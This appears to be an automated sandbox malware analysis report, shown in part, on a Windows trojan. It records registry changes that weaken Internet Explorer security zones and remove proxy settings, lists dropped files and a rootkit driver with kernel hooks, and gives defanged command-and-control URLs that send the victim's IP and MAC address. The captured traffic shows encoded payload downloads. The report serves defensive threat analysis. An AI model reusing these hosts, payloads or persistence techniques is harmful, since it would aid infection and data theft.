[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 E3 22 63 02 25 39 AD A1 3E C2 E1 1A 86 45 50"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ndislib.exe:3296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 B7 C4 21 DA 26 5B B7 48 09 01 EF 15 6D 02 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\uo2zITM\Security]
[HKLM\System\CurrentControlSet\Services\uo2zITM]
[HKLM\System\CurrentControlSet\Services\uo2zITM\Enum]

Dropped PE files

MD5 File path
ac26e6f812162a024170cb017e6da5c8 c:\WINDOWS\HpE\hdptlk.exe
eba2283a18b7a9e89bf308a9e5e1608c c:\WINDOWS\HpE\sys32\urlnav.dll
fc2c1ce99b49f7ac04ef3ff570061ae9 c:\WINDOWS\system32\LQdhJ\yYJSx.exe
d70c6fba5055c9f030553d69ca959ef1 c:\WINDOWS\system32\drivers\HideSys.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwCreateSection

The Trojan installs the following kernel-mode hooks:

ZwOpenProcess
ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 455174 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 462848 2431724 0 0 d41d8cd98f00b204e9800998ecf8427e
.data 2895872 207240 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp0 3104768 966430 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp1 4071424 3871300 3874816 5.44825 0c41f9724bee2aaa564195d102c256f0
.rsrc 7946240 5744 8192 1.90322 200729e9e76fca5d3157a990fafb7b96

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://update.down123.net/tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 115.28.45.16
hxxp://update.down123.net/deploy.php?ConFig=xz9 115.28.45.16
hxxp://1st.ecoma.ourwebpic.com/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37
hxxp://ln.p2ptool.com/txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 60.18.147.37
hxxp://ln.p2ptool.com/txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 60.18.147.37
hxxp://ln.p2ptool.com/txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C 60.18.147.37
hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 60.18.147.37
hxxp://ln.p2ptool.com/txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A 60.18.147.37
hxxp://ln.p2ptool.com/txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 60.18.147.37
hxxp://ln.p2ptool.com/txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 60.18.147.37
hxxp://ln.p2ptool.com/txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA 60.18.147.37
hxxp://ln.p2ptool.com/txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 60.18.147.37
hxxp://ln.p2ptool.com/txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E 60.18.147.37
hxxp://ln.p2ptool.com/txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 60.18.147.37
hxxp://ln.p2ptool.com/txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C 60.18.147.37
hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 60.18.147.37
hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 60.18.147.37
hxxp://plus.zzinfor.cn/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 203.130.58.30


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET TROJAN PWS Win32/Lmir.BMQ checkin

Traffic

GET /txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:49 GMT
Content-Type: text/plain
Content-Length: 324428
Last-Modified: Tue, 10 Nov 2015 11:43:50 GMT
Connection: close
ETag: "5641d876-4f34c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjTh
fOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4
bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK 
pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHB
OK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRS
I7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>


GET /txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:46 GMT
Content-Type: text/plain
Content-Length: 141392
Last-Modified: Fri, 06 Nov 2015 14:52:41 GMT
Connection: close
ETag: "563cbeb9-22850"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjTh
fOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4
bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK 
pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHB
OK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRS
I7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>


GET /txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:39 GMT
Content-Type: text/plain
Content-Length: 17808
Last-Modified: Fri, 06 Nov 2015 14:52:13 GMT
Connection: close
ETag: "563cbe9d-4590"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROKjttvFmiakCZt5yAEloqcdFU3c0qOtFRYDZAdH
Hwb Qxt9I jqSgc4ULm66opXrWBkOiGdpJ xQoMTH3OmgMQJkUShelUIsDfL/hdCWFtkn/
y62uU0mNGqMsAApyLHJ4j6aH00q0LLsr6FlXJFw9vDIbA8NM/MBAcsX/7BlxWcm jOrtHz
XNJwHVr1zBaZBvDIhS24H2g4292X8RJor98PJ/3Y RAHLFiBns21a08LzZ9NQJKMqlTtge
75/mtJONL4g mIuCzv1s5vG78A6DGTbVaOa1tXM1tCuQn5reB/GadtqV6Y5LJt7Ek3k/W2
aZ85m6MostnYNXS5PA1dBcmiDVyHpS9CA/ZF3msze1qfmM4ySmpBTxy1O5vT wkQGvUjqJ
OUSqN7 bFBWSdZKyfDWgfcJ5BEK rYVr4Ti1ZvAVDdS9TT0sp1QglzpGQ7ATTd2J  nZGQ
wwbwoUSDkEDD/jk3M/k5HFHcsbNHhOchtR0U1l60XX357YnLbrtgMM24tPM5IuTMWwWZew
nxW8JOIptenBO3ZCnKp1kJtXgfe1UW4uGAjNlmR1fKC L/NftvcUWkpO9eliCl2AfmFx/q
gZ13w8PyvLPTXcL JXD5HyRaMQdZ9Y7YcIDfT0iBIhvTM5jY66l3DbzUJcXQNKlZgqSb8 
Ae/V2PH/qVC6zaNt9XzQFqYllpIjfOSbQ7ki3aXAJVFiW6v36EHjFGWhMWrbTuoJTZfRk6
hAkN4gK3q3Z1tP8vDNMzE/D7lZg9mIww7esNKBvDHYPwFmdbrZOFClhIIzcEryxXp2kGPf
rBsQqtlv3i8iM3CgETUyfIVMbla/r4MeVT60Etch7IV4MKloRceCEaHUIUEsGpfKiTsLH4
l5FkFAOIc3buJHaeAMAmh7Xojqnpz f/tYFXf2j1pee3DTbhsT82ABDkRytOsKxFXiAuof
NV2GHabjaUOJQ6mxSx8oPqfELHIPn1p5WgBmct5GdqTfL3bMRF95j5esatBQcGwPgULXT4
RnY9gix5OJKSK0ajYbXQG7I8LIt7IZTOzLWFySDobY2xdfxLtQybtJZsMP5pvpqhsEWYZU
wLMKhdFzYWEYNMUGUipV/spHDdbiVSrjhP9b/qwVyW6YFLoiO7uVwvsrX 14gkE ted0Fm
zahoKLwWTeoxgP5l8NNC2S4mDakhpSpLhK/UwVQ5/Drrjs5c9WLgqTwr6e3lBGIRg0ZBKi
eftYq0gI9u9aqmfDv145VCYstieNcaIFj2Iv/A/o7REZEvT4V2cS4biMlG4duycqvLpBka
Fhyg3GPNDAHGzziZISsm5psTMviD6Yi4LO/WXVjfp5EIfQ8ySqMTmVe/CcLz/v6BdJXF4J
7nCND/v2Ho5LnzeIeKyScOGHbxpIXGwz5Bmp7YZJm1Lj Lt4SWIq6OULu3vMH eoC/mJ k
A15SGWTSvEPvDvFy6X6sH0VAKKIWpnEtiaLhYCFIZ7MkkDIfQ3wN50TZmRvl620owG
<<< skipped >>>


GET /txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 1840480
Last-Modified: Wed, 30 Sep 2015 02:45:35 GMT
Connection: close
ETag: "560b4ccf-1c1560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJuacViNEyUzNtsQ1NYTf8d27GQD/J9XGD4qYxi8v
xIiixIcnCOyBlOFqr9ETxrT SBHjArMiqMiHMIxSfRWU4KPY5pTF7DF2xKszLM0SuU/GyP
DEKip3LDGtIHKgAjlwGoaHXIorCjbMTazQ2ZSPlr5flXLXC5JH3rPV7VCE5C4Yz4h3K0AO
lFthiN4cVI3AP3NdgUfwDLK6r5zh2O0mhQ43fNWIPwFNWXJyfQNpBOtYm ARi1SoBtib4B
GLVKgG0V2AJJhDBVqEnSGpMq4o L6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
uKOtlnCKi AJIKLreHt1XkxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrObdsagrdZm/E2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrmemWon5Q0qfE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr y6jpxuwh2p u92whz 8tvE2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPV9cZRQclYDv0cRH5FzB75MxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWDx
WdJSNxrGJ7Zm5VGZfamcTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWLGPOS2/c nLVhRzQsiY
Eo7E2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5OX8lKKswkonGwm ElZZQzib/wxCcfowCJZ
YUINYVTz1wg5aryKKMjyVskrcu QLtkrK5piaVn9RyE0rmYnzCbUjapOQdShugPmV6dHZs
IK5F58pVNTdf3jCmkkLn7p8wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uN1W2huWLpgU
<<< skipped >>>


GET /txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:56 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Y
e5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLE
Onja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9h
subAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6d
hDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMR
hz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HV
CyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 U
IxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9
AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6p
sVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgI
LxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9
Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygN
WYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55z
wjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xa
